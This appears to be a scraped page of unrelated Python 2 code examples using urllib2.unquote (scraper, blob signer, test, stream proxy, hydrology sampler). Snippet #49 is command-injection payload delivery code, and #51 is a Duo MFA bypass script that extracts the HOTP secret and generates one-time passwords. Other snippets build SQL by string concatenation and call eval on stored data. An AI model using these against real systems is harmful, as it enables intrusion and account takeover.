                transaction(self._database_transaction, raw_adi_logs_pathname,
                            target_date)

        finally:
            if os.path.isfile(raw_adi_logs_pathname):
                os.remove(raw_adi_logs_pathname)
Пример #49
0
    def check_injection(separator, TAG, cmd, prefix, suffix, whitespace,
                        http_request_method, url, vuln_parameter, alter_shell,
                        filename):
        if alter_shell:
            # Classic decision payload (check if host is vulnerable).
            payload = cb_payloads.cmd_execution_alter_shell(
                separator, TAG, cmd)
        else:
            # Classic decision payload (check if host is vulnerable).
            payload = cb_payloads.cmd_execution(separator, TAG, cmd)

        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        # Whitespace fixation
        payload = payload.replace(" ", whitespace)

        # Perform payload modification
        payload = checks.perform_payload_modification(payload)

        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL >= 1:
            info_msg = "Executing the '" + cmd + "' command... "
            sys.stdout.write(settings.print_info_msg(info_msg))
            sys.stdout.flush()
            sys.stdout.write("\n" + settings.print_payload(payload) + "\n")

        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            response = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            response = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            response = referer_injection_test(url, vuln_parameter, payload)

        # Check if defined host with "INJECT_HERE" tag
        elif menu.options.host and settings.INJECT_TAG in menu.options.host:
            response = host_injection_test(url, vuln_parameter, payload)

        # Check if defined custom header with "INJECT_HERE" tag
        elif settings.CUSTOM_HEADER_INJECTION:
            response = custom_header_injection_test(url, vuln_parameter,
                                                    payload)

        else:
            # Check if defined method is GET (Default).
            if http_request_method == "GET":

                # Check if its not specified the 'INJECT_HERE' tag
                #url = parameters.do_GET_check(url)
                target = url.replace(settings.INJECT_TAG, payload)
                vuln_parameter = ''.join(vuln_parameter)
                request = urllib2.Request(target)

                # Check if defined extra headers.
                headers.do_check(request)

                # Get the response of the request.
                response = requests.get_request_response(request)

            else:
                # Check if defined method is POST.
                parameter = menu.options.data
                parameter = urllib2.unquote(parameter)
                # Check if its not specified the 'INJECT_HERE' tag
                parameter = parameters.do_POST_check(parameter)
                parameter = parameter.replace("+", "%2B")
                # Define the POST data
                if settings.IS_JSON:
                    data = parameter.replace(
                        settings.INJECT_TAG,
                        urllib.unquote(payload.replace("\"", "\\\"")))
                    try:
                        data = checks.json_data(data)
                    except ValueError:
                        pass
                elif settings.IS_XML:
                    data = parameter.replace(settings.INJECT_TAG,
                                             urllib.unquote(payload))
                else:
                    data = parameter.replace(settings.INJECT_TAG, payload)
                request = urllib2.Request(url, data)

                # Check if defined extra headers.
                headers.do_check(request)

                # Get the response of the request.
                response = requests.get_request_response(request)

        return response
Пример #50
0
def quote_url(url):
    return encode_url(unquote(url).decode('utf-8'))
Пример #51
0
import pyotp
import requests
import base64
import json
import sys
from urllib2 import unquote


if __name__ == '__main__':
	if len(sys.argv) < 2:
	    print "Usage: python duo_bypass.py <url to duo qr>"; exit()

	qr_url = sys.argv[1]
	data = unquote(qr_url.split('=')[1])

	hostb64 = data.split('-')[1]

	host = base64.b64decode(hostb64 + '='*(-len(hostb64) % 4))
	code = data.split('-')[0].replace('duo://', '')

	url = 'https://{host}/push/v2/activation/{code}'.format(host=host, code=code)
	r = requests.post(url)
	response = json.loads(r.text)

	secret = base64.b32encode(response['response']['hotp_secret'])
	print "HOTP Secret:", secret

	print "10 Next OneTime Passwords!"
	# Generate 10 Otps!
	hotp = pyotp.HOTP(secret)
	for _ in xrange(10):
Пример #52
0
def fetchMiaopaiData():
    uname = '/app/yxtk/script/useragent.txt'
    f1 = open("/app/yxtk/script/data/cosmopolitan.sql", 'w', buffering=-1)
    with open(uname) as f:
        useragents = f.readlines()
    userAgent = random.choice(useragents)
    headers = {
        'Accept':
        'application/json, text/javascript, */*; q=0.01',
        'Accept-Encoding':
        'gzip, deflate, sdch',
        'Accept-Language':
        'zh-CN,zh;q=0.8',
        'Cache-Control':
        'max-age=0',
        'Connection':
        'keep-alive',
        'Host':
        'http://fashion.cosmopolitan.com.cn/howto/',
        'Referer':
        'http://fashion.cosmopolitan.com.cn/howto/',
        'Upgrade-Insecure-Requests':
        '1',
        'X-Requested-With':
        'XMLHttpRequest',
        'User-Agent':
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'
    }
    while True:
        for j in range(1, 8):
            time.sleep(1)
            if j == 1:
                url = 'http://fashion.cosmopolitan.com.cn/howto/'
            if j == 2:
                url = 'http://fashion.cosmopolitan.com.cn/now/'
            if j == 3:
                url = 'http://fashion.cosmopolitan.com.cn/catwalk/'
            if j == 4:
                url = 'http://fashion.cosmopolitan.com.cn/streetstyle/'
            if j == 5:
                url = 'http://fashion.cosmopolitan.com.cn/goddess/'
            if j == 6:
                url = 'http://fashion.cosmopolitan.com.cn/cookies/'
            if j == 7:
                url = 'http://lohas.cosmopolitan.com.cn/bigger/'
            print url
            try:
                encoding_support = ContentEncodingProcessor
                req = urllib2.Request(url)
                res = urllib2.urlopen(req)
                html = unicode(res.read(), "GBK")
                res.close()
                doc = pq(html)
                #doc = pq(url
                divs = doc('div.s_list')
                for li in divs.items():
                    url = li('a').attr('href')
                    m = re.findall(r'(\w+[0-9]+)\w*', str(url))
                    clo_id = m[2]
                    print url
                    title = "\" " + li('h3').children('a').text().encode(
                        'utf8') + " \""
                    title = title.replace("\n", '')
                    title = title.replace(",", ',')
                    print title
                    pic = li('a').children('img').attr('src')
                    print pic
                    imageUrl = qiniuUpdate(pic.strip())
                    date = li('div.time').children('span').text()

                    req = urllib2.Request(url)
                    res = urllib2.urlopen(req)
                    html1 = unicode(res.read(), 'GBK')
                    html1 = re.sub(r'<script>(.*?)</script>', '', html1)
                    res.close()
                    doc1 = pq(html1)
                    con = doc1('div.detail_c')
                    con('img').removeAttr("style")
                    con('img').removeAttr("width")
                    con('img').removeAttr("height")
                    con('img').attr("style", "width:100%")
                    p = con('div.detail_c').html()
                    if p is None or p == '':
                        continue
                    p = re.sub(r'&#13;', '', p)
                    p = re.sub(r'<style.*>([\S\s\t]*?)</style>', '', p)
                    p = re.sub(r'<script.*>([\S\s\t]*?)</script>', '', p)
                    p = re.sub(r'<p[^>]*>', '<p>', p)
                    p = re.sub(r'<(?!img|br|p|/p).*?>', '', p)
                    p = re.sub(r'\r', '', p)
                    p = re.sub(r'\n', '', p)
                    p = re.sub(r'\s', '', p)
                    p = re.sub(r'src=', ' src=', p)

                    newqiniu = pq(p)
                    imgs = newqiniu('img')
                    for image in imgs.items():
                        imgurl = image('img').attr('src')
                        newimgurl = qiniuUpdate(imgurl.strip())
                        p = p.replace(str(imgurl), str(newimgurl))
                    sql = "INSERT INTO 3rd_clothes(id,creator,modifier,create_time,modify_time,is_deleted,clothes_id,title,clothes_date,img_url,sort,user_id,thumbnail_url,source,tag,content,push_flag,recommend_flag,view_status)VALUES(NULL,'sys','sys',now(),now(),'n','" + clo_id + "'," + title.strip(
                    ) + ",'" + date.strip() + "','" + pic.strip(
                    ) + "','0','','" + imageUrl + "','时尚COSMO','','" + p.strip(
                    ) + "',0,NULL,0);" + '\n'
                    print sql
                    f1.writelines(sql)
                    file_name = urllib2.unquote(
                        pic.strip()).decode('utf8').split('/')[-1]
                    os.remove('/app/yxtk/script/' + file_name)
            except Exception as e:
                print e
        break
    f1.close()
Пример #53
0
def xmlProxy(originalXMLWebserviceURL):
  decodedURL = urllib2.unquote(originalXMLWebserviceURL)
  f = urllib2.urlopen(decodedURL)
  xml = f.read()
  parsedXML = xmltodict.parse(xml)
  return json.dumps(parsedXML)
Пример #54
0
def get_portal(language=None, country=None, categories=None):
    """
    get a list of text and images for feed/rss and labels
    """

    if not language or not language:
        return None
    if language not in LANGUAGES:
        return None
    if country not in COUNTRIES:
        return None

    search_limit = 70
    images_limit = 1
    portal_data = {}
    categories = urllib2.unquote(categories.strip()).split(',')

    for user_subscription in categories:
        user_subscription = user_subscription.replace('+', ' ')
        category, feed = user_subscription.split('*|*')
        entries = get_latest_entries(
            language=language, country=country, category=category, feed=feed,
            limit=search_limit)
        # 'category A': [{'title':'xxx', 'image':'http://yyy.com/zzz.jpg'}]
        # image: category_image
        portal_data[user_subscription] = []
        text_image_item = None
        for entry in entries:
            # only one text_image is necessary
            if 'text_image' in entry and entry[
                'text_image'] and not text_image_item:
                if isinstance(entry['text_image'], str):
                    entry['text_image'] = eval(entry['text_image'])
                text_image = entry['text_image']
                text_image_item = {
                    'title': entry['title'], 'image': text_image,
                    'updated': entry['updated']}

            # search for category_image
            if 'category_image' in entry and entry['category_image'] and entry[
                'category_image'] != 'None' and entry[
                'category_image'] != 'null':
                if isinstance(entry['category_image'], str):
                    entry['category_image'] = eval(entry['category_image'])
                item = {'title': entry['title'], 'image': entry[
                    'category_image'], 'updated': entry['updated']}
                portal_data[user_subscription].append(item)
                # limit the number of category_image to
                if len(portal_data[user_subscription]) == images_limit:
                    break

        # can't find any category image, use text image instead, if available
        if not portal_data[user_subscription] and text_image_item:
            portal_data[user_subscription].append(text_image_item)

    # special formatting for android-end
    output = []
    for k, v in portal_data.iteritems():
        if k and v:
            category, feed = k.split('*|*')
            output.append(
                {'Category': category, 'Feed': feed, 'Images': v})
    return {'Categories': output}
Пример #55
0
def urlDecode(encodedString):
    decodedString = urllib2.unquote(encodedString.encode("utf8"))
    return decodedString
Пример #56
0
 def blob(self, method, account, path, body=None, headers=None, tag=None):
     debug('blob: %s %s %s %s %s\n' %
           (method, account, path, repr(body[:1024]) if isinstance(
               body, basestring) else str(body), headers))
     headers_dict = {}
     if headers is not None:
         for h in headers:
             name, val = h.split(':', 1)
             name = name.strip().lower()
             val = val.strip()
             headers_dict[name] = val
     if body and 'content-type' not in headers_dict:
         headers_dict['content-type'] = 'application/octet-stream'
         md5 = hashlib.md5()
         md5.update(body)
         headers_dict['content-md5'] = base64.b64encode(md5.digest())
     date = time.strftime('%a, %d %b %Y %H:%M:%S GMT', time.gmtime())
     headers_dict['x-ms-date'] = date
     if 'x-ms-version' not in headers_dict:
         headers_dict['x-ms-version'] = '2015-04-05'
     if account is None:
         m = re.match(
             r'https?://([^\.]+)\.blob\.%s(.*)$' %
             self.environment.core.replace('.', '\\.'), path)
         if m:
             account = m.group(1)
             path = m.group(2)
     markers = []
     result = []
     while True:
         marker_path = path
         if markers:
             marker_path += '&marker=' + markers[0]
         path_for_sig, sep, query = marker_path.partition('?')
         if query:
             params = {}
             for p in query.split('&'):
                 n, v = p.split('=', 1)
                 v = urllib2.unquote(v)
                 if '\n' in v or ',' in v:
                     raise Exception('cannot sign url with "\\n" or ","')
                 if n not in params:
                     params[n] = []
                 params[n].append(v)
             for n in sorted(params):
                 path_for_sig += ('\n' + urllib2.unquote(n) + ':' +
                                  ','.join(params[n]))
         data = (
             method + '\n' + headers_dict.get('content-encoding', '') +
             '\n' + headers_dict.get('content-language', '') + '\n' +
             (str(len(body)) if body else '') + '\n' +  # content-length
             headers_dict.get('content-md5', '') + '\n' +
             headers_dict.get('content-type', '') + '\n' +
             headers_dict.get('date', '') + '\n' +
             headers_dict.get('if-modified-since', '') + '\n' +
             headers_dict.get('if-match', '') + '\n' +
             headers_dict.get('if-none-match', '') + '\n' +
             headers_dict.get('if-unmodified-since', '') + '\n' +
             headers_dict.get('range', '') + '\n')
         for h in sorted(headers_dict):
             if h.startswith('x-ms'):
                 data += h + ':' + headers_dict[h] + '\n'
         account, key = self.account_key(account)
         data += '/' + account + path_for_sig
         sig = base64.b64encode(
             hmac.HMAC(base64.b64decode(key), data,
                       hashlib.sha256).digest())
         headers_dict['authorization'] = 'SharedKey ' + account + ':' + sig
         headers = ['%s: %s' % (n, headers_dict[n]) for n in headers_dict]
         h, b = request(method,
                        'https://' + account + '.blob.' +
                        self.environment.core + marker_path,
                        body=body,
                        headers=headers,
                        pool=self.pool,
                        max_time=self.max_time)
         if not tag:
             return h, b
         result += [e for e in b.getElementsByTagName(tag)]
         markers = values(b, 'NextMarker')
         if not markers:
             break
     b = xml.dom.minidom.parseString('<' + tag + 's/>')
     for e in result:
         b.documentElement.appendChild(e)
     return {}, b
Пример #57
0
    def test_with_two_batch_open(self):
        self.batch.open_for_location(self.location)
        self.batch_1.open_for_location(self.location)

        self.assertEquals(HouseholdMemberBatchCompletion.objects.count(), 0)

        mock_filter = MagicMock()
        mock_filter.exists.return_value = True
        with patch.object(RandomHouseHoldSelection.objects,
                          'filter',
                          return_value=mock_filter):
            with patch.object(USSDSurvey, 'is_active', return_value=False):
                self.reset_session()

            self.choose_menu_to_take_survey()
            self.select_household()
            response = self.select_household_member()
            response_string = "responseString=%s&action=request" % self.question_1.to_ussd(
            )
            self.assertEquals(urllib2.unquote(response.content),
                              response_string)

            response = self.respond("1")
            response_string = "responseString=%s&action=request" % self.question_2.to_ussd(
            )
            self.assertEquals(urllib2.unquote(response.content),
                              response_string)

            response = self.respond("1")
            response_string = "responseString=%s&action=request" % self.question_3.to_ussd(
            )
            self.assertEquals(urllib2.unquote(response.content),
                              response_string)

            self.assertEquals(HouseholdMemberBatchCompletion.objects.count(),
                              1)
            household_completed = HouseholdMemberBatchCompletion.objects.latest(
                'id')
            self.assertEquals(household_completed.household, self.household)
            self.assertEquals(household_completed.householdmember,
                              self.household_head.get_member())
            self.assertEquals(household_completed.investigator,
                              self.investigator)
            self.assertEquals(household_completed.batch, self.batch)

            response = self.respond("1")
            response_string = "responseString=%s&action=request" % self.question_4.to_ussd(
            )
            self.assertEquals(urllib2.unquote(response.content),
                              response_string)

            response = self.respond("1")
            response_string = "responseString=%s&action=request" % USSD.MESSAGES[
                'HOUSEHOLD_COMPLETION_MESSAGE']
            self.assertEquals(urllib2.unquote(response.content),
                              response_string)

            self.assertEquals(HouseholdMemberBatchCompletion.objects.count(),
                              2)
            household_completed = HouseholdMemberBatchCompletion.objects.latest(
                'id')
            self.assertEquals(household_completed.household, self.household)
            self.assertEquals(household_completed.householdmember,
                              self.household_head.get_member())
            self.assertEquals(household_completed.investigator,
                              self.investigator)
            self.assertEquals(household_completed.batch, self.batch_1)
Пример #58
0
def getLinks(connection, location, done, ignore, kbEntries):
    mkdir(location)
    try:
        page = 0
        pageSize = 50
        getPage = True
        while getPage:
            params = {"count": pageSize, "offset": page * pageSize}
            print "GET: " + connection[
                "baseUrl"] + location + "?" + "count=" + str(
                    pageSize) + "&offset=" + str(
                        page * pageSize) + " -> Done: " + str(len(done))
            start = connection["session"].get(
                url=connection["baseUrl"] + location,
                timeout=60,
                params=params,
                auth=(connection["user"], connection["passwd"]),
                verify=False).content
            start = re.sub(
                r"<updated>.*?<\/updated>", "", start
            )  # Cause we're going to git, we remove these as they will change
            start = re.sub(r"<s:key name=\"next_scheduled_time\">.*?</s:key>",
                           "", start)  # and we want this to be clean.
            if start.startswith("<?xml") and not start.lower(
            ) == "internal rest handler error":
                xmlData = xml.dom.minidom.parseString(start)
                if xmlData.getElementsByTagName("opensearch:totalResults"):
                    searchSize = int(
                        xmlData.getElementsByTagName("opensearch:totalResults")
                        [0].firstChild.wholeText)
                    offset = int(
                        xmlData.getElementsByTagName("opensearch:startIndex")
                        [0].firstChild.wholeText)
                else:
                    searchSize = 0
                    offset = 0
                if searchSize == 1:  # By default we only will save single elements, not lists
                    fh = open(location + "/object-" + str(page) + ".xml", "w")
                    fh.write(start)
                    fh.close()
                if offset + pageSize >= searchSize:
                    getPage = False
                else:
                    page = page + 1
                for link in xmlData.getElementsByTagName("link"):
                    thing = urllib2.unquote(link.getAttribute("href")[1:])
                    if link.getAttribute("rel") in ["list", "alternate"]:
                        inIgnore = False
                        for item in ignore:
                            if thing.startswith(item):
                                inIgnore = True
                    else:
                        inIgnore = True
                    if not thing in done and not inIgnore:
                        done.append(thing)
                        done = getLinks(connection, thing, done, ignore,
                                        kbEntries)
                        # Get round annoying splunk bug that doesn't pull it all back :(
                        if location == "services/apps/local":
                            hack = thing.replace(
                                "servicesNS/nobody/system/apps/local/",
                                "servicesNS/nobody/")
                            for entry in kbEntries:
                                want = hack + "/admin" + entry
                                if not want in done:
                                    done.append(want)
                                    done = getLinks(connection, want, done,
                                                    ignore, kbEntries)
            else:
                fh = open(location + "/object.txt", "w")
                fh.write(start)
                fh.close()
                getPage = False
        return done
    except Exception as e:
        print "oops!"
        print e
        return done
Пример #59
0
    def handleRequest(self, headers_only):
        # Check if third parameter exists
        # …/pid/blablablablabla/video.mpg
        #                      |_________|
        # And if it ends with regular video extension
        try:
            if not self.path.endswith(
                ('.3gp', '.avi', '.flv', '.mkv', '.mov', '.mp4', '.mpeg',
                 '.mpg', '.ogv', '.ts')):
                logger.error(
                    "Request seems like valid but no valid video extension was provided"
                )
                self.dieWithError(400)
                return
        except IndexError:
            self.dieWithError(400)  # 400 Bad Request
            return

        # Limit concurrent connections
        if 0 < AceConfig.maxconns <= AceStuff.clientcounter.total:
            logger.debug("Maximum connections reached, can't serve this")
            self.dieWithError(503)  # 503 Service Unavailable
            return

        # Pretend to work fine with Fake UAs or HEAD request.
        useragent = self.headers.get('User-Agent')
        fakeua = useragent and useragent in AceConfig.fakeuas
        if headers_only or fakeua:
            if fakeua:
                logger.debug("Got fake UA: " + self.headers.get('User-Agent'))
            # Return 200 and exit
            self.send_response(200)
            self.send_header("Content-Type", "video/mpeg")
            self.end_headers()
            self.closeConnection()
            return

        self.path_unquoted = urllib2.unquote(self.splittedpath[2])
        # Make list with parameters
        self.params = list()
        for i in xrange(3, 8):
            try:
                self.params.append(int(self.splittedpath[i]))
            except (IndexError, ValueError):
                self.params.append('0')

        # Adding client to clientcounter
        clients = AceStuff.clientcounter.add(self.path_unquoted, self.clientip)
        # If we are the one client, but sucessfully got ace from clientcounter,
        # then somebody is waiting in the videodestroydelay state
        self.ace = AceStuff.clientcounter.getAce(self.path_unquoted)
        if not self.ace:
            shouldcreateace = True
        else:
            shouldcreateace = False

        # Use PID as VLC ID if PID requested
        # Or torrent url MD5 hash if torrent requested
        if self.reqtype == 'pid':
            self.vlcid = self.path_unquoted
        else:
            self.vlcid = hashlib.md5(self.path_unquoted).hexdigest()

        # If we don't use VLC and we're not the first client
        if clients != 1 and not AceConfig.vlcuse:
            AceStuff.clientcounter.delete(self.path_unquoted, self.clientip)
            logger.error(
                "Not the first client, cannot continue in non-VLC mode")
            self.dieWithError(503)  # 503 Service Unavailable
            return

        if shouldcreateace:
            # If we are the only client, create AceClient
            try:
                self.ace = aceclient.AceClient(
                    AceConfig.acehost,
                    AceConfig.aceport,
                    connect_timeout=AceConfig.aceconntimeout,
                    result_timeout=AceConfig.aceresulttimeout)
                # Adding AceClient instance to pool
                AceStuff.clientcounter.addAce(self.path_unquoted, self.ace)
                logger.debug("AceClient created")
            except aceclient.AceException as e:
                logger.error("AceClient create exception: " + repr(e))
                AceStuff.clientcounter.delete(self.path_unquoted,
                                              self.clientip)
                self.dieWithError(502)  # 502 Bad Gateway
                return

        # Send fake headers if this User-Agent is in fakeheaderuas tuple
        if fakeua:
            logger.debug("Sending fake headers for " + useragent)
            self.send_response(200)
            self.send_header("Content-Type", "video/mpeg")
            self.end_headers()
            # Do not send real headers at all
            self.headerssent = True

        try:
            self.hanggreenlet = gevent.spawn(self.hangDetector)
            logger.debug("hangDetector spawned")
            gevent.sleep()

            # Initializing AceClient
            if shouldcreateace:
                self.ace.aceInit(gender=AceConfig.acesex,
                                 age=AceConfig.aceage,
                                 product_key=AceConfig.acekey,
                                 pause_delay=AceConfig.videopausedelay,
                                 seekback=AceConfig.videoseekback)
                logger.debug("AceClient inited")
                if self.reqtype == 'pid':
                    contentinfo = self.ace.START(
                        self.reqtype, {
                            'content_id': self.path_unquoted,
                            'file_indexes': self.params[0]
                        })
                elif self.reqtype == 'torrent':
                    paramsdict = dict(
                        zip(aceclient.acemessages.AceConst.START_TORRENT,
                            self.params))
                    paramsdict['url'] = self.path_unquoted
                    contentinfo = self.ace.START(self.reqtype, paramsdict)
                logger.debug("START done")

            # Getting URL
            self.url = self.ace.getUrl(AceConfig.videotimeout)
            # Rewriting host for remote Ace Stream Engine
            self.url = self.url.replace('127.0.0.1', AceConfig.acehost)
            self.errorhappened = False

            if shouldcreateace:
                logger.debug("Got url " + self.url)
                # If using VLC, add this url to VLC
                if AceConfig.vlcuse:
                    # Force ffmpeg demuxing if set in config
                    if AceConfig.vlcforceffmpeg:
                        self.vlcprefix = 'http/ffmpeg://'
                    else:
                        self.vlcprefix = ''

                    self.ace.pause()
                    # Sleeping videodelay
                    gevent.sleep(AceConfig.videodelay)
                    self.ace.play()

                    AceStuff.vlcclient.startBroadcast(
                        self.vlcid, self.vlcprefix + self.url,
                        AceConfig.vlcmux, AceConfig.vlcpreaccess)
                    # Sleep a bit, because sometimes VLC doesn't open port in
                    # time
                    gevent.sleep(0.5)

            # Building new VLC url
            if AceConfig.vlcuse:
                self.url = 'http://' + AceConfig.vlchost + \
                    ':' + str(AceConfig.vlcoutport) + '/' + self.vlcid
                logger.debug("VLC url " + self.url)

            # Sending client headers to videostream
            self.video = urllib2.Request(self.url)
            for key in self.headers.dict:
                self.video.add_header(key, self.headers.dict[key])

            self.video = urllib2.urlopen(self.video)

            # Sending videostream headers to client
            if not self.headerssent:
                self.send_response(self.video.getcode())
                if self.video.info().dict.has_key('connection'):
                    del self.video.info().dict['connection']
                if self.video.info().dict.has_key('server'):
                    del self.video.info().dict['server']
                if self.video.info().dict.has_key('transfer-encoding'):
                    del self.video.info().dict['transfer-encoding']
                if self.video.info().dict.has_key('keep-alive'):
                    del self.video.info().dict['keep-alive']

                for key in self.video.info().dict:
                    self.send_header(key, self.video.info().dict[key])
                # End headers. Next goes video data
                self.end_headers()
                logger.debug("Headers sent")

            if not AceConfig.vlcuse:
                self.ace.pause()
                # Sleeping videodelay
                gevent.sleep(AceConfig.videodelay)
                self.ace.play()

            # Run proxyReadWrite
            self.proxyReadWrite()

            # Waiting until hangDetector is joined
            self.hanggreenlet.join()
            logger.debug("Request handler finished")

        except (aceclient.AceException, vlcclient.VlcException,
                urllib2.URLError) as e:
            logger.error("Exception: " + repr(e))
            self.errorhappened = True
            self.dieWithError()
        except gevent.GreenletExit:
            # hangDetector told us about client disconnection
            pass
        except Exception:
            # Unknown exception
            logger.error(traceback.format_exc())
            self.errorhappened = True
            self.dieWithError()
        finally:
            logger.debug("END REQUEST")
            AceStuff.clientcounter.delete(self.path_unquoted, self.clientip)
            if not self.errorhappened and not AceStuff.clientcounter.get(
                    self.path_unquoted):
                # If no error happened and we are the only client
                logger.debug("Sleeping for " +
                             str(AceConfig.videodestroydelay) + " seconds")
                gevent.sleep(AceConfig.videodestroydelay)
            if not AceStuff.clientcounter.get(self.path_unquoted):
                logger.debug("That was the last client, destroying AceClient")
                if AceConfig.vlcuse:
                    try:
                        AceStuff.vlcclient.stopBroadcast(self.vlcid)
                    except:
                        pass
                self.ace.destroy()
                AceStuff.clientcounter.deleteAce(self.path_unquoted)
Пример #60
0
def application(environ, start_response):
    path = environ['PATH_INFO']
    method = environ['REQUEST_METHOD']
    if method == 'POST':
        try:
            request_body_size = int(environ['CONTENT_LENGTH'])
            request_body = environ['wsgi.input'].read(request_body_size)

            #http://stackoverflow.com/questions/17417620/python-requests-encoding-post-data
            decoded_request = urllib2.unquote(request_body).decode('utf-8')
            logger.info("Received message from worker: %s" %
                        decoded_request[5:])

            parsed = json.loads(
                decoded_request[5:])  # Skip first 5 characters ("body=...")
            info = "FeedID: " + str(
                parsed['environment']['id']) + ", Channel: " + str(
                    parsed['triggering_datastream']['id']) + ", Value: " + str(
                        parsed['triggering_datastream']['value']['value']
                    ) + ", Time: " + str(parsed['triggering_datastream']['at'])
            logger.info("Received message from worker: %s" % info)
            #logger.info("Received message from worker: %s" % str(scipy.version.version))

            # Begin Processing for Xively
            forecast = get_forecast(url)

            # Forecast for 0.1"
            pqpf, pop, qpf, epoch = get_pqpf(forecast)
            post_forecast(pqpf * 100)

            # Forecast for 0.01"
            pqpf_01 = get_pqpf(forecast, amt=0.01)[0]
            post_forecast(pqpf_01 * 100, channel='p_rain001')
            logger.info(
                "Received message from worker: at: %f, pop: %2d, qpf: %4s, pqpf(0.1): %2.2f, pqpf(0.01): %2.2f"
                % (epoch, pop, qpf, pqpf * 100, pqpf_01 * 100))

            # Get Change in Depth over Time
            dxdt = dchannel_dt(channel='depth_sonic')
            dxdt = [-d / 12 for d in dxdt
                    ]  #invert values for sonic sensor, convert to mm/5 mins
            update_channel(value=dxdt[-1], channel='delta_depth_sonic')
            logger.info("Received message from worker: dQ/dt: %f" % dxdt[-1])

            #tf_bottle = sampled_recently(duration = 60)
            #tf_sonic  = sampled_recently(duration = 60, channel = 'depth_sonic')
            #logger.info("Received message from worker: Recently sampled.. bottle: %s; sonic: %s" % (str(tf_bottle),str(tf_sonic)))

            algorithm_enabled = get_current_value(channel='enable_sampler')

            if algorithm_enabled > 0:
                # # Take a sample if conditions are met
                # if dxdt[-1] >= min_dflow :  # Water level is rising faster than min_dflow
                #   flag = not( sampled_recently(duration = 30) )
                #   if ( flag ):
                #     post_trigger()
                #     logger.info("Received message from worker: dQ/dt: %f and 30+ minutes since a sample" % dxdt[-1])

                # elif pqpf >= 0.50 :  # Probability of exceeding rainfall is greater than 50%
                #   flag = not( sampled_recently(duration = 60) )
                #   if ( flag ):
                #     post_trigger()
                #     logger.info("Received message from worker: pqpf: %2.2f and 60+ minutes since a sample" % pqpf*100)

                current_state = get_current_value(channel='hydrograph_state')
                depth_peak = get_current_value(channel='depth_peak')
                depth_base = get_current_value(channel='depth_base')
                dxdt_max = get_current_value(channel='delta_depth_max')
                pqpf_list = get_history(channel='p_rain')[0]
                depth_list = get_history(channel='depth_sonic')[0]
                pqpf_avg = .3 * pqpf_list[-3] + .4 * pqpf_list[
                    -2] + .3 * pqpf_list[-1]  # 3-pt Welch Window
                depth = depth_list[-1]

                # CHECK THIS
                if dxdt[-1] >= min_dflow:  # Water level is rising faster than min_dflow
                    # hydrograph is now rising
                    if not (current_state == RISING
                            or current_state == PEAKING):
                        current_state = RISING
                        # take sample if one hasn't been taken in past 10 mins
                        flag = not (sampled_recently(duration=10))

                    # inflection in hydrograph: discharge started increasing again
                    # before a peak was reached
                    elif current_state == PEAKING and dxdt[-1] > dxdt[-2]:
                        current_state = RISING
                        # take sample if one hasn't been taken in past 10 mins
                        flag = not (sampled_recently(duration=10))

                    if (flag):
                        post_trigger()

                        logger.info(
                            "Received message from worker: dQ/dt: %f triggered and 10+ minutes since a sample"
                            % dxdt[-1])

                    if dxdt[-1] > dxdt_max:  # update dxdt_max
                        #dxdt_max = dxdt[-1]
                        update_channel(channel='delta_depth_max',
                                       value=dxdt[-1])

                if current_state == BASEFLOW and pqpf_avg / 100 >= 0.10:
                    update_channel(
                        channel='depth_base',
                        value=depth)  # update depth_base to baseflow value

                    flag = not (sampled_recently(duration=120))
                    if (flag):
                        post_trigger()
                        logger.info(
                            "Received message from worker: pqpf: %2.2f and 60+ minutes since a sample"
                            % (pqpf * 100))

                if current_state == RISING and dxdt[-1] < dxdt_max and dxdt[
                        -1] > 0:
                    # hydrograph was rising, but now the rate is slowing down
                    current_state = PEAKING

                    # take sample if one hasn't been taken in past 10 mins
                    flag = not (sampled_recently(duration=10))
                    if (flag):
                        post_trigger()

                    logger.info(
                        "Received message from worker: dQ/dt: %f falling" %
                        dxdt[-1])

                elif (current_state == RISING
                      or current_state == PEAKING) and dxdt[-1] <= 0:
                    # hydrograph has stopped rising and is now transitioning to falling limb
                    current_state = PEAK
                    #depth_peak = depth  # update depth_peak to value closest to peak
                    update_channel(channel='depth_peak', value=depth)

                    # take sample if one hasn't been taken in past 10 mins
                    flag = not (sampled_recently(duration=10))
                    if (flag):
                        post_trigger()

                    logger.info(
                        "Received message from worker: dQ/dt max: %f now increasing less"
                        % dxdt_max)

                elif current_state == PEAK and depth >= (
                        depth_base - .75 * (depth_base - depth_peak)):
                    # for ultrasonic, depth_base is always greater than depth_peak
                    # hydrograph now on falling limb.  Currently below 75% max
                    current_state = FALLING

                    # take sample if one hasn't been taken in past 10 mins
                    flag = not (sampled_recently(duration=10))
                    if (flag):
                        post_trigger()

                    logger.info(
                        "Received message from worker: Falling past .75 max depth"
                    )

                # Sample if hydrograph rises back above 75% max
                # elif current_state == FALLING and depth < (depth_base - .75*(depth_base - depth_peak)) :
                #   # for ultrasonic, depth_base is always greater than depth_peak
                #   current_state = RISING
                #   if dxdt[-1] > dxdt_max: # update dxdt_max
                #     #dxdt_max = dxdt[-1]
                #     update_channel(channel='delta_depth_max',value=dxdt[-1])
                #
                #   # take sample if one hasn't been taken in past 60 mins
                #   flag = not( sampled_recently(duration = 60) )
                #   if ( flag ):
                #     post_trigger()
                #     logger.info("Received message from worker: Rising past .75 max depth")

                # Hydrograph is approaching baseflow.  Reset depth variables
                elif current_state == FALLING and depth >= (
                        depth_base - .10 * (depth_base - depth_peak)):
                    # for ultrasonic, depth_base is always greater than depth_peak
                    current_state = BASEFLOW
                    update_channel(channel='depth_peak',
                                   value=depth_base)  #depth_peak = depth_base
                    update_channel(channel='delta_depth_max',
                                   value=0)  #dxdt_max = 0

                    # take sample if one hasn't been taken in past 10 mins
                    flag = not (sampled_recently(duration=10))
                    if (flag):
                        post_trigger()

                    logger.info(
                        "Received message from worker: Returning to baseflow")

                update_channel(channel='hydrograph_state', value=current_state)

        except (TypeError, ValueError):
            logger.warning('Error retrieving request body for async work.')

    elif method == 'GET':
